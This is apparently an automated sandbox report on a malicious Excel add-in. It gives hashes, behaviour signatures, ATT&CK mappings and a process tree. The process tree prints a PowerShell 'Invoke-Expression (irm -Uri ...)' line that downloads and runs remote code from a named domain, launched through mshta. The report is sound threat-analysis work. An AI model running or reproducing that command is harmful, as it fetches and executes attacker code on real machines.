Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-05-2024 18:08

General

  • Target

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll

  • Size

    12KB

  • MD5

    ee5e9694a8a265985fe814a47b9246a0

  • SHA1

    ae2717c4016d750ad1c3c623467d8be176b40ecc

  • SHA256

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc

  • SHA512

    a261c07ad0f19af39871c3a5bffe46bf3e8604da7b9cb4d5a082825598c5247d9840aec0e3a5418fe489d008341eec31ad39b267b4da19bd22c66621b3b6d1a6

  • SSDEEP

    192:XL29RBzDzeobchBj8JONJONUruarEPEjr7AhG:729jnbcvYJOSuuavr7CG

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3604
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1676

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PRZ6L9YH\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knjp3xrm.wec.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll
    Filesize

    12KB

    MD5

    ee5e9694a8a265985fe814a47b9246a0

    SHA1

    ae2717c4016d750ad1c3c623467d8be176b40ecc

    SHA256

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc

    SHA512

    a261c07ad0f19af39871c3a5bffe46bf3e8604da7b9cb4d5a082825598c5247d9840aec0e3a5418fe489d008341eec31ad39b267b4da19bd22c66621b3b6d1a6

  • memory/1676-59-0x00000000071D0000-0x000000000784A000-memory.dmp
    Filesize

    6.5MB

  • memory/1676-42-0x0000000004CD0000-0x0000000004CF2000-memory.dmp
    Filesize

    136KB

  • memory/1676-60-0x0000000006070000-0x000000000608A000-memory.dmp
    Filesize

    104KB

  • memory/1676-58-0x0000000005B80000-0x0000000005BCC000-memory.dmp
    Filesize

    304KB

  • memory/1676-57-0x0000000005B50000-0x0000000005B6E000-memory.dmp
    Filesize

    120KB

  • memory/1676-41-0x0000000004E00000-0x000000000542A000-memory.dmp
    Filesize

    6.2MB

  • memory/1676-51-0x0000000005680000-0x00000000059D7000-memory.dmp
    Filesize

    3.3MB

  • memory/1676-40-0x00000000046D0000-0x0000000004706000-memory.dmp
    Filesize

    216KB

  • memory/1676-44-0x0000000005610000-0x0000000005676000-memory.dmp
    Filesize

    408KB

  • memory/1676-43-0x00000000055A0000-0x0000000005606000-memory.dmp
    Filesize

    408KB

  • memory/2664-13-0x00007FFAA30A0000-0x00007FFAA30B0000-memory.dmp
    Filesize

    64KB

  • memory/2664-2-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-16-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-17-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-21-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-20-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-19-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-18-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-15-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-3-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-6-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-9-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-11-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-14-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-12-0x00007FFAA30A0000-0x00007FFAA30B0000-memory.dmp
    Filesize

    64KB

  • memory/2664-4-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-7-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-10-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-8-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-1-0x00007FFAE55C3000-0x00007FFAE55C4000-memory.dmp
    Filesize

    4KB

  • memory/2664-0-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-5-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-66-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-68-0x00007FFAE55C3000-0x00007FFAE55C4000-memory.dmp
    Filesize

    4KB

  • memory/2664-69-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-70-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB

  • memory/2664-86-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-87-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-89-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-88-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
    Filesize

    64KB

  • memory/2664-90-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
    Filesize

    2.0MB